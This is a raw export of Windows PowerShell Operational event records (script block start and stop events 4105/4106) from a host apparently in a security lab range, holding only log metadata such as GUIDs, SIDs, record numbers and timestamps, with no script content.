EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477238
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477237
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477236
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477235
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477234
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477233
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477232
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477231
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477230
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477229
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477228
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477227
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477226
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477225
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477224
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477223
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477222
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477221
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477220
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477219
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477218
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477217
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477216
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477215
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477214
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477213
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477212
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477211
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477210
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477209
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477208
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477207
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477206
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477205
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477204
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477203
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477202
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477201
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477200
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477199
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477198
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477197
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477196
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477195
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477194
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477193
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477192
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477191
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477190
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477189
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477188
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477187
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477186
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477185
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477184
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477183
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
